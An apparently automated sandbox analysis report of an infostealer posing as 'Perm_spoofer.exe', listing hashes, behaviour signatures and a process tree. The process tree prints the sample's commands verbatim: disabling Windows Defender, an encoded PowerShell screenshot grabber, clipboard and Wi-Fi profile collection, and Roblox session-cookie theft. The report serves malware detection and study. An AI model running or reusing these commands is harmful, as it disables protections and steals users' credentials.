Analysis

  • max time kernel
    4s
  • max time network
    8s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-07-2024 19:03

General

  • Target

    Perm_spoofer.exe

  • Size

    7.0MB

  • MD5

    c8c9e646a005116c6efb67c51264226c

  • SHA1

    d165de2840effaf85dcf6699e32cae4e128ce1da

  • SHA256

    27bafcf7e4921815647b80c290338908b9ea395948d9569504e56e554c15b12d

  • SHA512

    50f788f1b3fa21bb62dba446065ec5d574b8df2563d9279cecbafa26d52044de7a040069685d0d63da8ee7f821f304ab164a794ef991d19c26dab84e0186bb5c

  • SSDEEP

    196608:CraBV1QEB6ylnlPzf+JiJCsmFMvNn6hVvT8:wEBRlnlPSa7mmvN+r8

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4148
    • C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe
      "C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Perm_spoofer.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1484
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1648
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Outdated', 0, 'Error', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Outdated', 0, 'Error', 48+16);close()"
          4⤵
            PID:2408
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2880
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4812
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4440
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1952
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:1636
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4176
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3976
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3280
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2876
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‎‎.scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3652
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌​‎‎.scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4316
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:3716
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:4624
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                  PID:1900
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    4⤵
                      PID:4004
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    3⤵
                      PID:3492
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        4⤵
                          PID:1368
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                          PID:920
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            4⤵
                            • Enumerates processes with tasklist
                            PID:3316
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:916
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:1888
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                              3⤵
                                PID:2308
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show profile
                                  4⤵
                                    PID:1188
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "systeminfo"
                                  3⤵
                                    PID:1472
                                    • C:\Windows\system32\systeminfo.exe
                                      systeminfo
                                      4⤵
                                      • Gathers system information
                                      PID:3540
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                    3⤵
                                      PID:936
                                      • C:\Windows\system32\reg.exe
                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                        4⤵
                                          PID:968
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                        3⤵
                                          PID:4980
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            PID:4832
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jldn5eoz\jldn5eoz.cmdline"
                                              5⤵
                                                PID:3284
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6830.tmp" "c:\Users\Admin\AppData\Local\Temp\jldn5eoz\CSC57645B543C2A473489F1FE2B97291285.TMP"
                                                  6⤵
                                                    PID:4964
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:2884
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:2808
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                  3⤵
                                                    PID:1428
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      4⤵
                                                        PID:2876
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:4540
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4328
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2608
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                          3⤵
                                                            PID:832
                                                            • C:\Windows\system32\attrib.exe
                                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                                              4⤵
                                                              • Views/modifies file attributes
                                                              PID:4864
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:3208
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:2644
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                3⤵
                                                                  PID:676
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist /FO LIST
                                                                    4⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:1892
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  3⤵
                                                                    PID:4272
                                                                    • C:\Windows\system32\tree.com
                                                                      tree /A /F
                                                                      4⤵
                                                                        PID:624
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                      3⤵
                                                                        PID:1680
                                                                        • C:\Windows\system32\tree.com
                                                                          tree /A /F
                                                                          4⤵
                                                                            PID:916
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                          3⤵
                                                                            PID:4524
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              4⤵
                                                                                PID:2324
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                              3⤵
                                                                                PID:4052
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                  4⤵
                                                                                    PID:2452

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                            Execution

                                                                            Command and Scripting Interpreter

                                                                            1
                                                                            T1059

                                                                            PowerShell

                                                                            1
                                                                            T1059.001

                                                                            Defense Evasion

                                                                            Hide Artifacts

                                                                            1
                                                                            T1564

                                                                            Hidden Files and Directories

                                                                            1
                                                                            T1564.001

                                                                            Credential Access

                                                                            Unsecured Credentials

                                                                            2
                                                                            T1552

                                                                            Credentials In Files

                                                                            2
                                                                            T1552.001

                                                                            Discovery

                                                                            System Information Discovery

                                                                            2
                                                                            T1082

                                                                            Process Discovery

                                                                            1
                                                                            T1057

                                                                            Collection

                                                                            Data from Local System

                                                                            2
                                                                            T1005

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                              SHA1

                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                              SHA256

                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                              SHA512

                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                              Filesize

                                                                              944B

                                                                              MD5

                                                                              62623d22bd9e037191765d5083ce16a3

                                                                              SHA1

                                                                              4a07da6872672f715a4780513d95ed8ddeefd259

                                                                              SHA256

                                                                              95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                              SHA512

                                                                              9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                              Filesize

                                                                              944B

                                                                              MD5

                                                                              eb033be02578f9635ec47bdc1de5c3fb

                                                                              SHA1

                                                                              ec356bc87381354a06baa9c30e8c3ac3d30e0f6f

                                                                              SHA256

